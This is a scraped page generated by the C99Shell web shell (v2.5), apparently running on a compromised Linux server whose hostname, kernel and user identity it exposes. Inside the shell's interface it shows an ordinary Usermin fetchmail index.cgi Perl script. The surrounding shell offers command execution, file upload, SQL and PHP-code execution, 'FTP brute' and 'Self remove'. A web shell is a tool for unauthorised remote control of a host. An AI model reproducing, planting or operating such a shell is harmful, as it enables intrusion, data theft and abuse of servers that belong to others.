!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/usr/share/usermin/fetchmail/   drwxr-xr-x
Free 26.66 GB of 117.98 GB (22.59%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     index.cgi (1.57 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# index.cgi
# Show fetchmail configurations

require './fetchmail-lib.pl';
&ui_print_header(undef, $text{'index_title'}, "", undef, 0, 1);

# Check if fetchmail is installed
if (!&has_command($config{'fetchmail_path'})) {
    print &text('index_efetchmail',
              "<tt>$config{'fetchmail_path'}</tt>"),"<p>\n";
    &ui_print_footer("/", $text{'index'});
    exit;
    }

@conf = &parse_config_file($fetchmail_config);
@conf = grep { $_->{'poll'} } @conf;
if (!@conf) {
    print "<b>$text{'index_none'}</b><p>\n";
    }
&show_polls(\@conf, $fetchmail_config, $remote_user_info[0]);

if (@conf) {
    # Show the fetchmail daemon form
    print "<hr>\n";
    print &ui_buttons_start();

    if (&foreign_check("cron") && $can_cron) {
        # Show button to manage cron job
        print &ui_buttons_row("edit_cron.cgi",
                      $text{'index_cron'},
                      $text{'index_crondesc'});
        }

    if ($can_daemon) {
        print "<tr><td>\n";
        foreach $pf ("$remote_user_info[7]/.fetchmail.pid",
                 "$remote_user_info[7]/.fetchmail") {
            if (open(PID, $pf) && ($line=<PID>) &&
                (($pid,$interval) = split(/\s+/, $line)) && $pid &&
                kill(0, $pid)) {
                $running = $pf;
                last;
                }
            }
        if ($running) {
            # daemon is running - offer to stop it
            print &ui_buttons_row("stop.cgi",
                $text{'index_stop'},
                &text('index_stopmsg',$interval));
            }
        else {
            # daemon isn't running - offer to start it
            print &ui_buttons_row("start.cgi",
                $text{'index_start'},
                &text('index_startmsg',
                      &ui_textbox("interval", 60, 5)));
            }
        }
    print &ui_buttons_end();
    }

&ui_print_footer("/", $text{'index'});


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0041 ]--